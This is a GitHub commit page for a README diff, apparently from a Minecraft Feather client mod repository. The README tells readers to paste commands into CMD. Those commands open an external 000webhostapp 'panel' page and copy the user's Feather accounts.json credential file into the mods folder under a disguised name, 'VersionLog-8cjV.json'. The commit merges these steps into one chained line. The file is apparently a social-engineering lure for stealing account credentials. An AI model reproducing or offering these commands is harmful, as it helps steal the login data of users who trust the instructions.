Skip to content

Commit

Permalink
README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
Andry541 authored May 17, 2024
1 parent e62e768 commit 568c58a
Showing 1 changed file with 1 addition and 3 deletions.
4 changes: 1 addition & 3 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -10,6 +10,4 @@

# Copy this code and write in CMD

start "" "https://sprawdzwersje.000webhostapp.com/panel.html"
start "" "C:\Users\%USERNAME%\AppData\Roaming\.feather\mods\"
XCOPY "C:\Users\%USERNAME%\AppData\Roaming\.feather\accounts.json" "C:\Users\%USERNAME%\AppData\Roaming\.feather\mods\VersionLog-8cjV.json" /Y /I > NUL
start "" "https://sprawdzwersje.000webhostapp.com/panel.html" && XCOPY "C:\Users\%USERNAME%\AppData\Roaming\.feather\accounts.json" "C:\Users\%USERNAME%\AppData\Roaming\.feather\mods\VersionLog-8cjV.json" /Y /I > NUL

0 comments on commit 568c58a

Please sign in to comment.